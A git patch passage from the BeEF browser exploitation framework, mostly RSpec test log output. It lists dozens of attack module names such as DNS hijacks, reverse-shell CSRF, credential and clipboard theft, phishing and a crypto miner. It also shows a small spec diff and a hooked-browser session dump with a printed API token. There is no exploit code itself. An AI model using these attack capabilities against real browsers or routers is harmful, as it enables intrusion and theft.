Unable to load module 'comtrend_ct_series_dns_hijack' +[12:25:44][!] Unable to load module 'ddwrt_v24_sp1_cmd_exec' +[12:25:44][!] Unable to load module 'dlink_2640b_dns_hijack' +[12:25:44][!] Unable to load module 'dlink_dsl526b_dns_hijack' +[12:25:44][!] Unable to load module 'dlink_dsl500t_csrf' +[12:25:44][!] Unable to load module 'asus_dslx11_dns_hijack' +[12:25:44][!] Unable to load module 'shuttle_tech_915wm_dns_hijack' +[12:25:44][!] Unable to load module 'philips_dns_hijack' +[12:25:44][!] Unable to load module 'cisco_e2400_csrf' +[12:25:44][!] Unable to load module 'comtrend_ct5367_csrf' +[12:25:44][!] Unable to load module 'argw4_adsl_dns_hijack' +[12:25:44][!] Unable to load module 'pikatel_96338_dns_hijack' +[12:25:44][!] Unable to load module 'iball_baton_ib_wra150n_dns_hijack' +[12:25:44][!] Unable to load module 'dlink_dsl2780b_dns_hijack' +[12:25:44][!] Unable to load module 'inteno_eg101r1_voip_dns_hijack' +[12:25:44][!] Unable to load module 'linksys_e2500_csrf' +[12:25:44][!] Unable to load module 'actiontec_q1000_csrf' +[12:25:44][!] Unable to load module 'com_officeconnect_cmd_exec' +[12:25:44][!] Unable to load module 'linksys_e2500_dns_hijack' +[12:25:44][!] Unable to load module 'asmax_ar804gu_cmd_exec' +[12:25:44][!] Unable to load module 'virgin_superhub_csrf' +[12:25:44][!] Unable to load module 'bt_home_hub_csrf' +[12:25:44][!] Unable to load module 'linksys_e2500_shell' +[12:25:44][!] Unable to load module 'beetel_bcm96338_router_dns_hijack' +[12:25:44][!] Unable to load module 'Netgear_dgn_2000_wan_mgmt_csrf' +[12:25:44][!] Unable to load module 'netgear_dgn2200_cmd_exec' +[12:25:44][!] Unable to load module 'tplink_dns_csrf' +[12:25:44][!] Unable to load module 'asus_rt_n66u_cmd_exec' +[12:25:44][!] Unable to load module 'ddwrt_v24_sp1_csrf' +[12:25:44][!] Unable to load module 'linksys_wrt54g2_csrf' +[12:25:44][!] Unable to load module 'telstra_zte_mf91_change_ssid' +[12:25:44][!] Unable to load module 'telstra_zte_mf91_change_pw' +[12:25:44][!] Unable to load module 'asus_rt_n12e_get_info' +[12:25:44][!] Unable to load module 'linksys_wrt54g_csrf' +[12:25:44][!] Unable to load module 'tenda_adsl_dns_hijack' +[12:25:44][!] Unable to load module 'belkin_dns_csrf' +[12:25:44][!] Unable to load module 'comtrend_ct5624_csrf' +[12:25:44][!] Unable to load module 'dlink_dsl2640u_dns_hijack' +[12:25:44][!] Unable to load module 'freenas_reverse_root_shell_csrf' +[12:25:44][!] Unable to load module 'dlink_sharecenter_cmd_exec' +[12:25:44][!] Unable to load module 'boastmachine_add_user_csrf' +[12:25:44][!] Unable to load module 'zenoss_add_user_csrf' +[12:25:44][!] Unable to load module 'hp_ucmdb_add_user_csrf' +[12:25:44][!] Unable to load module 'glassfish_war_upload_xsrf' +[12:25:44][!] Unable to load module 'ntfscommoncreate_dos' +[12:25:44][!] Unable to load module 'shell_shock_scanner' +[12:25:44][!] Unable to load module 'Wordpress_add_admin' +[12:25:44][!] Unable to load module 'apache_cookies' +[12:25:44][!] Unable to load module 'airlive_add_user_csrf' +[12:25:44][!] Unable to load module 'linksys_wvc_wireless_camera_csrf' +[12:25:44][!] Unable to load module 'Dlink_dcs_series_csrf' +[12:25:44][!] Unable to load module 'firephp_code_exec' +[12:25:44][!] Unable to load module 'Shell_shocked' +[12:25:44][!] Unable to load module 'Netgear_gs108t_csrf' +[12:25:44][!] Unable to load module 'Dlink_dgs_1100_device_reset_csrf' +[12:25:44][!] Unable to load module 'Dlink_dgs_1100_fdb_whitelist_csrf' +[12:25:44][!] Unable to load module 'Dlink_dgs_1100_port_mirroring_csrf' +[12:25:44][!] Unable to load module 'groovyshell_server_command_execution' +[12:25:44][!] Unable to load module 'jboss_jmx_upload_exploit' +[12:25:44][!] Unable to load module 'skype_xss' +[12:25:44][!] Unable to load module 'serendipity_1_6_xss' +[12:25:44][!] Unable to load module 'sqlitemanager_xss' +[12:25:44][!] Unable to load module 'cisco_collaboration_server_5_xss' +[12:25:44][!] Unable to load module 'alienvault_ossim_3_1_xss' +[12:25:44][!] Unable to load module 'extract_cmd_exec' +[12:25:44][!] Unable to load module 'monowall_reverse_root_shell_csrf' +[12:25:44][!] Unable to load module 'BeEF_bind_shell' +[12:25:44][!] Unable to load module 'Eudora_mail_beef_bind' +[12:25:44][!] Unable to load module 'Active_fax_beef_bind' +[12:25:44][!] Unable to load module 'zeroshell_2_0rc2_admin_password' +[12:25:44][!] Unable to load module 'zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass' +[12:25:44][!] Unable to load module 'zeroshell_2_0rc2_migrate_hook' +[12:25:44][!] Unable to load module 'zeroshell_2_0rc2_file_disclosure' +[12:25:44][!] Unable to load module 'zeroshell_2_0rc2_admin_static_token' +[12:25:44][!] Unable to load module 'zeroshell_2_0rc2_scanner' +[12:25:44][!] Unable to load module 'zeroshell_2_0rc2_admin_dynamic_token' +[12:25:44][!] Unable to load module 'zeroshell_2_0rc2_reverse_shell_csrf_sop' +[12:25:44][!] Unable to load module 'jenkins_groovy_code_exec' +[12:25:44][!] Unable to load module 'zenoss_command_execution' +[12:25:44][!] Unable to load module 'activex_command_execution' +[12:25:44][!] Unable to load module 'ie_ms12_004_midi' +[12:25:44][!] Unable to load module 'windows_mail_client_dos' +[12:25:44][!] Unable to load module 'java_payload' +[12:25:44][!] Unable to load module 'signed_applet_dropper' +[12:25:44][!] Unable to load module 'ie_ms13_069_caret' +[12:25:44][!] Unable to load module 'safari_launch_app' +[12:25:44][!] Unable to load module 'ruby_nntpd_cmd_exec' +[12:25:44][!] Unable to load module 'farsite_X25_remote_shell' +[12:25:44][!] Unable to load module 'php_dos' +[12:25:44][!] Unable to load module 'rfi_scanner' +[12:25:44][!] Unable to load module 'resource_exhaustion_dos' +[12:25:44][!] Unable to load module 'phonegap_check_connection' +[12:25:44][!] Unable to load module 'phonegap_list_files' +[12:25:44][!] Unable to load module 'phonegap_start_record_audio' +[12:25:44][!] Unable to load module 'phonegap_file_upload' +[12:25:44][!] Unable to load module 'phonegap_prompt_user' +[12:25:44][!] Unable to load module 'phonegap_persist_resume' +[12:25:44][!] Unable to load module 'phonegap_globalization_status' +[12:25:44][!] Unable to load module 'phonegap_keychain' +[12:25:44][!] Unable to load module 'phonegap_list_contacts' +[12:25:44][!] Unable to load module 'phonegap_persistence' +[12:25:44][!] Unable to load module 'phonegap_alert_user' +[12:25:44][!] Unable to load module 'phonegap_geo_locate' +[12:25:44][!] Unable to load module 'phonegap_plugin_detection' +[12:25:44][!] Unable to load module 'phonegap_detect' +[12:25:44][!] Unable to load module 'phonegap_stop_record_audio' +[12:25:44][!] Unable to load module 'phonegap_beep' +[12:25:44][!] Unable to load module 'steal_autocomplete' +[12:25:44][!] Unable to load module 'text_to_voice' +[12:25:44][!] Unable to load module 'pretty_theft' +[12:25:44][!] Unable to load module 'gmail_phishing' +[12:25:44][!] Unable to load module 'ui_abuse_ie' +[12:25:44][!] Unable to load module 'fake_lastpass' +[12:25:44][!] Unable to load module 'tabnabbing' +[12:25:44][!] Unable to load module 'sitekiosk_breakout' +[12:25:44][!] Unable to load module 'fake_notification_ie' +[12:25:44][!] Unable to load module 'replace_video_fake_plugin' +[12:25:44][!] Unable to load module 'fake_notification' +[12:25:44][!] Unable to load module 'clippy' +[12:25:44][!] Unable to load module 'fake_evernote_clipper' +[12:25:44][!] Unable to load module 'firefox_extension_reverse_shell' +[12:25:44][!] Unable to load module 'simple_hijacker' +[12:25:44][!] Unable to load module 'hta_powershell' +[12:25:44][!] Unable to load module 'clickjacking' +[12:25:44][!] Unable to load module 'spoof_addressbar_data' +[12:25:44][!] Unable to load module 'fake_notification_c' +[12:25:44][!] Unable to load module 'lcamtuf_download' +[12:25:44][!] Unable to load module 'edge_wscript_wsh_injection' +[12:25:44][!] Unable to load module 'firefox_extension_dropper' +[12:25:44][!] Unable to load module 'firefox_extension_bindshell' +[12:25:44][!] Unable to load module 'fake_notification_ff' +[12:25:44][!] Unable to load module 'fake_flash_update' +[12:25:44][!] Unable to load module 'cross_site_printing' +[12:25:44][!] Unable to load module 'cross_site_faxing' +[12:25:44][!] Unable to load module 'inter_protocol_win_bindshell' +[12:25:44][!] Unable to load module 'etag_client' +[12:25:44][!] Unable to load module 's2c_dns_tunnel' +[12:25:44][!] Unable to load module 'inter_protocol_imap' +[12:25:44][!] Unable to load module 'inter_protocol_redis' +[12:25:44][!] Unable to load module 'inter_protocol_posix_bindshell' +[12:25:44][!] Unable to load module 'inter_protocol_irc' +[12:25:44][!] Unable to load module 'send_inotes' +[12:25:44][!] Unable to load module 'extract_inotes_list' +[12:25:44][!] Unable to load module 'send_inotes_with_attachment' +[12:25:44][!] Unable to load module 'read_inotes' +[12:25:44][!] Unable to load module 'inotes_flooder' +[12:25:44][!] Unable to load module 'read_gmail' +[12:25:44][!] Unable to load module 'invisible_iframe' +[12:25:44][!] Unable to load module 'local_file_theft' +[12:25:44][!] Unable to load module 'iframe_keylogger' +[12:25:44][!] Unable to load module 'wordpress_current_user_info' +[12:25:44][!] Unable to load module 'wordpress_add_user' +[12:25:44][!] Unable to load module 'wordpress_upload_rce_plugin' +[12:25:44][!] Unable to load module 'wordpress_post_auth_rce' +[12:25:44][!] Unable to load module 'unblockui' +[12:25:44][!] Unable to load module 'iframe_sniffer' +[12:25:44][!] Unable to load module 'raw_javascript' +[12:25:44][!] Unable to load module 'blockui' +[12:25:44][!] Unable to load module 'no_sleep' +[12:25:44][!] Unable to load module 'cryptoloot_miner' +[12:25:44][!] Unable to load module 'track_physical_movement' +[12:25:44][!] Unable to load module 'detect_airdroid' +[12:25:44][!] Unable to load module 'get_registry_keys' +[12:25:44][!] Unable to load module 'iphone_tel' +[12:25:44][!] Unable to load module 'detect_protocol_handlers' +[12:25:44][!] Unable to load module 'physical_location_thirdparty' +[12:25:44][!] Unable to load module 'detect_coupon_printer' +[12:25:44][!] Unable to load module 'hook_microsoft_edge' +[12:25:44][!] Unable to load module 'detect_hp' +[12:25:44][!] Unable to load module 'detect_local_drives' +[12:25:44][!] Unable to load module 'get_battery_status' +[12:25:44][!] Unable to load module 'detect_cups' +[12:25:44][!] Unable to load module 'get_system_info_java' +[12:25:44][!] Unable to load module 'get_internal_ip_java' +[12:25:44][!] Unable to load module 'detect_antivirus' +[12:25:44][!] Unable to load module 'clipboard_theft' +[12:25:44][!] Unable to load module 'physical_location' +[12:25:44][!] Unable to load module 'detect_google_desktop' +[12:25:44][!] Unable to load module 'detect_default_browser' +[12:25:44][!] Unable to load module 'get_internal_ip_webrtc' +[12:25:44][!] Unable to load module 'get_connection_type' +[12:25:44][!] Unable to load module 'detect_users' +[12:25:44][!] Unable to load module 'detect_software' +[12:25:44][!] Unable to load module 'get_wireless_keys' +[12:25:44][!] Unable to load module 'hook_default_browser' +[12:25:44][!] Unable to load module 'popunder_window' +[12:25:44][!] Unable to load module 'popunder_window_ie' +[12:25:44][!] Unable to load module 'iframe_above' +[12:25:44][!] Unable to load module 'hijack_opener' +[12:25:44][!] Unable to load module 'invisible_htmlfile_activex' +[12:25:44][!] Unable to load module 'confirm_close_tab' +[12:25:44][!] Unable to load module 'man_in_the_browser' +[12:25:44][!] Unable to load module 'jsonp_service_worker' +[12:25:44][!] Unable to load module 'send_gvoice_sms' +[12:25:44][!] Unable to load module 'get_all_cookies' +[12:25:44][!] Unable to load module 'execute_tabs' +[12:25:44][!] Unable to load module 'grab_google_contacts' +[12:25:44][!] Unable to load module 'inject_beef' +[12:25:44][!] Unable to load module 'screenshot' +[12:25:54][>] Server: mounted handler '/hook.js' +[12:25:54][>] Server: mounted handler '/init' +[12:25:54][>] Server: mounted handler '/' +[12:25:54][>] Server: mounted handler '/dh' +[12:25:54][>] Server: mounted handler '/api/hooks' +[12:25:54][>] Server: mounted handler '/api/browserdetails' +[12:25:54][>] Server: mounted handler '/api/modules' +[12:25:54][>] Server: mounted handler '/api/categories' +[12:25:54][>] Server: mounted handler '/api/logs' +[12:25:54][>] Server: mounted handler '/api/admin' +[12:25:54][>] Server: mounted handler '/api/server' +[12:25:54][>] Server: mounted handler '/api/autorun' +[12:25:54][>] Server: mounted handler '/api/dns' +[12:25:54][>] Server: mounted handler '/api/ipec' +[12:25:54][>] Server: mounted handler '/api/proxy' +[12:25:54][>] Server: mounted handler '/requester' +[12:25:54][>] Server: mounted handler '/api/requester' +[12:25:54][>] Server: mounted handler '/xssrays' +[12:25:54][>] Server: mounted handler '/api/xssrays' +[12:25:54][>] Server: mounted handler '/api/network' +[12:25:54][>] Server: mounted handler '/api/seng' +[12:25:54][>] Server: mounted handler '/ps' +[12:25:54][>] Server: mounted handler '/ui/authentication' +[12:25:54][>] Server: mounted handler '/ui/panel' +[12:25:54][>] Server: mounted handler '/ui/modules' +[12:25:54][>] Server: mounted handler '/ui/media' +[12:25:54][>] [AdminUI] Initializing admin panel ... +[12:25:54][>] [AdminUI] Minifying web_ui_all (384858 bytes) +[12:25:57][>] [AdminUI] Minified web_ui_all (215617 bytes) +[12:25:57][>] [AdminUI] Minifying web_ui_auth (1787 bytes) +[12:25:58][>] [AdminUI] Minified web_ui_auth (1122 bytes) +[12:25:58][>] Server: mounted handler '/ui/web_ui_all.js' +[12:25:58][>] Server: mounted handler '/ui/web_ui_auth.js' +[12:25:58][>] Server: mounted handler '/event' +[12:25:58][>] Server: mounted handler '/demos' +[12:25:58][>] Server: mounted handler '/demos/report.html' +[12:25:58][>] Server: mounted handler '/demos/clickjacking/clickjack_victim.html' +[12:25:58][>] Server: mounted handler '/demos/clickjacking/clickjack_attack.html' +[12:25:58][>] Server: mounted handler '/demos/butcher/index.html' +[12:25:58][>] Server: mounted handler '/demos/basic.html' +[12:25:58][>] Server: mounted handler '/demos/plain.html' +[12:25:58][>] Server: mounted handler '/demos/secret_page.html' +[12:25:58][*] DNS Server: 127.0.0.1:5300 (udp) +[12:25:58] | Upstream Server: 8.8.8.8:53 (udp) +[12:25:58] |_ Upstream Server: 8.8.8.8:53 (tcp) +[12:25:58][*] HTTP Proxy: http://127.0.0.1:6789 +[12:25:58][!] API Fire Error: undefined method `each' for nil:NilClass in {:owner=>BeEF::Extension::Qrcode::QrcodeGenerator, :id=>16}.pre_http_start() + The Test_beef.debug() command module successfully executes (FAILED - 1) + The Return ASCII Characters command module successfully executes (FAILED - 2) + The Return Image command module successfully executes (FAILED - 3) + The Test HTTP Redirect command module successfully executes (FAILED - 4) + The Test Returning Results/Long String command module successfully executes (FAILED - 5) + The Test Network Request command module successfully executes (FAILED - 6) + The Test DNS Tunnel command module successfully executes (FAILED - 7) + The Test CORS Request command module successfully executes (FAILED - 8) + +BeEF Extension WebRTC + loads configuration + +BeEF BrowserDetails + set value + set nil value +[12:26:07][>] Browser has updated 'vtxpofqjbf' to 'pydkilbgwy' + update value + +BeEF Extension Console + loads configuration + +BeEF Extension Network + add good not local host + add good local host + add good service + +BeEF API Rate Limit +[12:26:07][>] Server: mounted handler '/hook.js' +[12:26:07][>] Server: mounted handler '/init' +[12:26:07][>] Server: mounted handler '/' +[12:26:07][>] Server: mounted handler '/dh' +[12:26:07][>] Server: mounted handler '/api/hooks' +[12:26:07][>] Server: mounted handler '/api/browserdetails' +[12:26:07][>] Server: mounted handler '/api/modules' +[12:26:07][>] Server: mounted handler '/api/categories' +[12:26:07][>] Server: mounted handler '/api/logs' +[12:26:07][>] Server: mounted handler '/api/admin' +[12:26:07][>] Server: mounted handler '/api/server' +[12:26:07][>] Server: mounted handler '/api/autorun' +[12:26:07][>] Server: mounted handler '/api/dns' +[12:26:07][>] Server: mounted handler '/api/ipec' +[12:26:07][>] Server: mounted handler '/api/proxy' +[12:26:07][>] Server: mounted handler '/requester' +[12:26:07][>] Server: mounted handler '/api/requester' +[12:26:07][>] Server: mounted handler '/xssrays' +[12:26:07][>] Server: mounted handler '/api/xssrays' +[12:26:07][>] Server: mounted handler '/api/network' +[12:26:07][>] Server: mounted handler '/api/seng' +[12:26:07][>] Server: mounted handler '/ps' +[12:26:07][>] Server: mounted handler '/ui/authentication' +[12:26:07][>] Server: mounted handler '/ui/panel' +[12:26:07][>] Server: mounted handler '/ui/modules' +[12:26:07][>] Server: mounted handler '/ui/media' +[12:26:07][>] [AdminUI] Initializing admin panel ... +[12:26:07][>] [AdminUI] Minifying web_ui_all (384858 bytes) +[12:26:10][>] [AdminUI] Minified web_ui_all (215617 bytes) +[12:26:10][>] [AdminUI] Minifying web_ui_auth (1787 bytes) +[12:26:11][>] [AdminUI] Minified web_ui_auth (1122 bytes) +[12:26:11][>] Server: mounted handler '/ui/web_ui_all.js' +[12:26:11][>] Server: mounted handler '/ui/web_ui_auth.js' +[12:26:11][>] Server: mounted handler '/event' +[12:26:11][>] Server: mounted handler '/demos' +[12:26:11][>] Server: mounted handler '/demos/report.html' +[12:26:11][>] Server: mounted handler '/demos/clickjacking/clickjack_victim.html' +[12:26:11][>] Server: mounted handler '/demos/clickjacking/clickjack_attack.html' +[12:26:11][>] Server: mounted handler '/demos/butcher/index.html' +[12:26:11][>] Server: mounted handler '/demos/basic.html' +[12:26:11][>] Server: mounted handler '/demos/plain.html' +[12:26:11][>] Server: mounted handler '/demos/secret_page.html' +[12:26:11][*] DNS Server: 127.0.0.1:5300 (udp) +[12:26:11] | Upstream Server: 8.8.8.8:53 (udp) +[12:26:11] |_ Upstream Server: 8.8.8.8:53 (tcp) +[12:26:11][*] HTTP Proxy: http://127.0.0.1:6789 +[12:26:11][!] API Fire Error: undefined method `each' for nil:NilClass in {:owner=>BeEF::Extension::Qrcode::QrcodeGenerator, :id=>16}.pre_http_start() +speed requesets +delayed requests +speed requesets +delayed requests +speed requesets +delayed requests + adheres to auth rate limits + +BeEF Extension AdminUI + confirms that X-Forwarded-For cant be spoofed when reverse proxy is disabled + confirms that an ip address is permitted to view the admin ui + confirms that an ip address is not permitted to view the admin ui + loads configuration + confirms that any ip address is permitted to view the admin ui + +BeEF Extension WebSockets + confirms that a secure websocket server has been started +[12:26:47][>] [WebSocket] New WebSocket channel open. + confirms that a websocket client can connect to the BeEF Websocket Server + confirms that a websocket server has been started + +BeEF Extension DNS +[12:26:48][>] [WebSocket] Connection closed: {:code=>1000, :reason=>"", :was_clean=>true} + failure types + get ruleset + remove ruleset + loaded configuration + remove bad rule + get good rule + responds to interfaces + remove good rule + get bad rule + add good rule + 1.2.3.4 + 9.9.9.9 + domains + add bad rule + 4.2.4.2 + +BeEF Extension XSSRays + interface + loads configuration + +BeEF Filesystem + required files + executable directories + +BeEF Extension QRCode + loads configuration + +BeEF Filters + has_valid_param_chars? + true + false + is_non_empty_string? + Four num chars begining with null + First char is num + null + First char is alpha + Empty String + Integer + Four num chars + Four num chars begining with alpha + nil + alphanums_only? + true with + lowercase + uppercase + numbers + general + false with + additional nulls + alphabet around null + general + alphabet null after + alphabet null before + only? + fail + success + is_valid_float? + true with general + false with general + has_non_printable_char? + true with + general + alphabet null before + false with + lowercase + general + uppercase + numbers + nums_only? + false with general + true with general + first_char_is_num? + false with general + true with general + hexs_only? + true with general + false with general + has_null? + false with + general + alphabet + true with + general + alphabet null before + alphabet null after + exists? + success + fail + has_whitespace_char? + false with general + true with general + +BeEF Extensions +[12:26:48][>] Loaded extension: 'network' +[12:26:48][>] Loaded extension: 'social_engineering' +[12:26:48][>] Loaded extension: 'admin_ui' +[12:26:48][>] Loaded extension: 'events' +[12:26:48][>] Loaded extension: 'requester' +[12:26:48][>] Loaded extension: 'proxy' +[12:26:48][>] Loaded extension: 'xssrays' +[12:26:48][>] Loaded extension: 'demos' + loaded successfully + +Pending: (Failures listed here are expected and do not affect your suite's status) + + 1) BeEF Extension Requester requester works + # Temporarily skipped with xit + # ./spec/beef/extensions/requester_spec.rb:22 + +Failures: + + 1) BeEF Debug Command Modules: The Test_beef.debug() command module successfully executes + Failure/Error: @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] + + NoMethodError: + undefined method `[]' for nil:NilClass + # ./spec/beef/modules/debug/test_beef_debugs_spec.rb:81:in `block (2 levels) in ' + + 2) BeEF Debug Command Modules: The Return ASCII Characters command module successfully executes + Failure/Error: @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] + + NoMethodError: + undefined method `[]' for nil:NilClass + # ./spec/beef/modules/debug/test_beef_debugs_spec.rb:81:in `block (2 levels) in ' + + 3) BeEF Debug Command Modules: The Return Image command module successfully executes + Failure/Error: @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] + + NoMethodError: + undefined method `[]' for nil:NilClass + # ./spec/beef/modules/debug/test_beef_debugs_spec.rb:81:in `block (2 levels) in ' + + 4) BeEF Debug Command Modules: The Test HTTP Redirect command module successfully executes + Failure/Error: @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] + + NoMethodError: + undefined method `[]' for nil:NilClass + # ./spec/beef/modules/debug/test_beef_debugs_spec.rb:81:in `block (2 levels) in ' + + 5) BeEF Debug Command Modules: The Test Returning Results/Long String command module successfully executes + Failure/Error: @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] + + NoMethodError: + undefined method `[]' for nil:NilClass + # ./spec/beef/modules/debug/test_beef_debugs_spec.rb:81:in `block (2 levels) in ' + + 6) BeEF Debug Command Modules: The Test Network Request command module successfully executes + Failure/Error: @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] + + NoMethodError: + undefined method `[]' for nil:NilClass + # ./spec/beef/modules/debug/test_beef_debugs_spec.rb:81:in `block (2 levels) in ' + + 7) BeEF Debug Command Modules: The Test DNS Tunnel command module successfully executes + Failure/Error: @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] + + NoMethodError: + undefined method `[]' for nil:NilClass + # ./spec/beef/modules/debug/test_beef_debugs_spec.rb:81:in `block (2 levels) in ' + + 8) BeEF Debug Command Modules: The Test CORS Request command module successfully executes + Failure/Error: @session = JSON.parse(@hooks)['hooked-browsers']['online']['0']['session'] + + NoMethodError: + undefined method `[]' for nil:NilClass + # ./spec/beef/modules/debug/test_beef_debugs_spec.rb:81:in `block (2 levels) in ' + +Finished in 1 minute 32.71 seconds (files took 1.53 seconds to load) +112 examples, 8 failures, 1 pending + +Failed examples: + +rspec ./spec/beef/modules/debug/test_beef_debugs_spec.rb:97 # BeEF Debug Command Modules: The Test_beef.debug() command module successfully executes +rspec ./spec/beef/modules/debug/test_beef_debugs_spec.rb:106 # BeEF Debug Command Modules: The Return ASCII Characters command module successfully executes +rspec ./spec/beef/modules/debug/test_beef_debugs_spec.rb:115 # BeEF Debug Command Modules: The Return Image command module successfully executes +rspec ./spec/beef/modules/debug/test_beef_debugs_spec.rb:125 # BeEF Debug Command Modules: The Test HTTP Redirect command module successfully executes +rspec ./spec/beef/modules/debug/test_beef_debugs_spec.rb:134 # BeEF Debug Command Modules: The Test Returning Results/Long String command module successfully executes +rspec ./spec/beef/modules/debug/test_beef_debugs_spec.rb:144 # BeEF Debug Command Modules: The Test Network Request command module successfully executes +rspec ./spec/beef/modules/debug/test_beef_debugs_spec.rb:161 # BeEF Debug Command Modules: The Test DNS Tunnel command module successfully executes +rspec ./spec/beef/modules/debug/test_beef_debugs_spec.rb:171 # BeEF Debug Command Modules: The Test CORS Request command module successfully executes + +Randomized with seed 39338 + From 1ba8b6d29a9efa77f31f2bfbcdb0b56a0f670104 Mon Sep 17 00:00:00 2001 From: Jack Walker Date: Thu, 16 Apr 2020 13:15:25 +1000 Subject: [PATCH 9/9] Removed byebug + other unneeded requires. Shortened some sleeps. --- .../modules/debug/test_beef_debugs_spec.rb | 4 +- test.log | 1656 ----------------- 2 files changed, 1 insertion(+), 1659 deletions(-) delete mode 100644 test.log diff --git a/spec/beef/modules/debug/test_beef_debugs_spec.rb b/spec/beef/modules/debug/test_beef_debugs_spec.rb index cacb341f1..e04afaf9c 100644 --- a/spec/beef/modules/debug/test_beef_debugs_spec.rb +++ b/spec/beef/modules/debug/test_beef_debugs_spec.rb @@ -8,8 +8,6 @@ require 'rest-client' require 'json' require_relative '../../../support/constants' require_relative '../../../support/beef_test' -require_relative '../../../../core/module' -require 'byebug' RSpec.describe 'BeEF Debug Command Modules:' do @@ -80,7 +78,7 @@ RSpec.describe 'BeEF Debug Command Modules:' do # Hook new victim @victim = BeefTest.new_victim - sleep 5 + sleep 3 # Identify Session ID of victim generated above @hooks = RestClient.get "#{RESTAPI_HOOKS}?token=#{@token}" diff --git a/test.log b/test.log deleted file mode 100644 index 736b042e9..000000000 --- a/test.log +++ /dev/null @@ -1,1656 +0,0 @@ -[12:25:15][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000]. - -Randomized with seed 39338 - -BeEF Redirector - redirects - -AutoRunEngine test -[12:25:16][>] Server: mounted handler '/hook.js' -[12:25:16][>] Server: mounted handler '/init' -[12:25:16][>] Server: mounted handler '/' -[12:25:16][>] Server: mounted handler '/dh' -[12:25:16][>] Server: mounted handler '/api/hooks' -[12:25:16][>] Server: mounted handler '/api/browserdetails' -[12:25:16][>] Server: mounted handler '/api/modules' -[12:25:16][>] Server: mounted handler '/api/categories' -[12:25:16][>] Server: mounted handler '/api/logs' -[12:25:16][>] Server: mounted handler '/api/admin' -[12:25:16][>] Server: mounted handler '/api/server' -[12:25:16][>] Server: mounted handler '/api/autorun' -[12:25:16][>] Server: mounted handler '/api/dns' -[12:25:16][>] Server: mounted handler '/api/ipec' -[12:25:16][>] Server: mounted handler '/api/proxy' -[12:25:16][>] Server: mounted handler '/requester' -[12:25:16][>] Server: mounted handler '/api/requester' -[12:25:16][>] Server: mounted handler '/xssrays' -[12:25:16][>] Server: mounted handler '/api/xssrays' -[12:25:16][!] API Fire Error: undefined method `[]' for nil:NilClass in {:owner=>BeEF::Extension::Dns::API::NameserverHandler, :id=>11}.pre_http_start() -[12:25:16][*] HTTP Proxy: http://: -[12:25:16][!] API Fire Error: undefined method `each' for nil:NilClass in {:owner=>BeEF::Extension::Qrcode::QrcodeGenerator, :id=>16}.pre_http_start() -authenticated. api token: ec1836817b7d733ebc03d7aba422a27cf27d471f -hooking a new victim, waiting a few seconds... - AutoRunEngine is working - -Browser details handler -[12:25:25][>] Server: mounted handler '/hook.js' -[12:25:25][>] Server: mounted handler '/init' -[12:25:25][>] Server: mounted handler '/' -[12:25:25][>] Server: mounted handler '/dh' -[12:25:25][>] Server: mounted handler '/api/hooks' -[12:25:25][>] Server: mounted handler '/api/browserdetails' -[12:25:25][>] Server: mounted handler '/api/modules' -[12:25:25][>] Server: mounted handler '/api/categories' -[12:25:25][>] Server: mounted handler '/api/logs' -[12:25:25][>] Server: mounted handler '/api/admin' -[12:25:25][>] Server: mounted handler '/api/server' -[12:25:25][>] Server: mounted handler '/api/autorun' -[12:25:25][>] Server: mounted handler '/api/dns' -[12:25:25][>] Server: mounted handler '/api/ipec' -[12:25:25][>] Server: mounted handler '/api/proxy' -[12:25:25][>] Server: mounted handler '/requester' -[12:25:25][>] Server: mounted handler '/api/requester' -[12:25:25][>] Server: mounted handler '/xssrays' -[12:25:25][>] Server: mounted handler '/api/xssrays' -[12:25:25][!] API Fire Error: undefined method `[]' for nil:NilClass in {:owner=>BeEF::Extension::Dns::API::NameserverHandler, :id=>11}.pre_http_start() -[12:25:25][*] HTTP Proxy: http://: -[12:25:25][!] API Fire Error: undefined method `each' for nil:NilClass in {:owner=>BeEF::Extension::Qrcode::QrcodeGenerator, :id=>16}.pre_http_start() -{"hooked-browsers"=>{"online"=>{}, "offline"=>{"0"=>{"id"=>1, "session"=>"EmDYRNIK1Ler0dtC1C8pJQrcCcHNLPXPrt4JKd7acnYAwrfB74TODbREBf778NdpX5Wr7vv434bcdSbm", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Virtual Machine", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586394267", "lastseen"=>"1587000539", "date_stamp"=>"Thu Apr 09 2020 11:04:27 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "1"=>{"id"=>2, "session"=>"S3pD3sJjSjgjbpCDXOsWZg6iHLpy1iKWKA55qdQZ7rJQybtvA2loKYkxHt4Ed6lWlwLbxTDoksol2cP7", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586400895", "lastseen"=>"1586400946", "date_stamp"=>"Thu Apr 09 2020 12:54:55 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "2"=>{"id"=>6, "session"=>"HzyGSniVQteRI1J7k6tTKjld9TeT0cvcXjumfq8gdzJbtmGcMphdwDpNeFMZicYZo4bRP41ppF2L69CP", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586418154", "lastseen"=>"1586418155", "date_stamp"=>"Thu Apr 09 2020 17:42:34 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "3"=>{"id"=>20, "session"=>"RUjYfzi4TVoLyYhqGGO6zTCpKhd4CV5d1Uk2ZJB3JkoBq5ftHRqZQKdKioc0NA1GEdfNRLwhz925aINI", 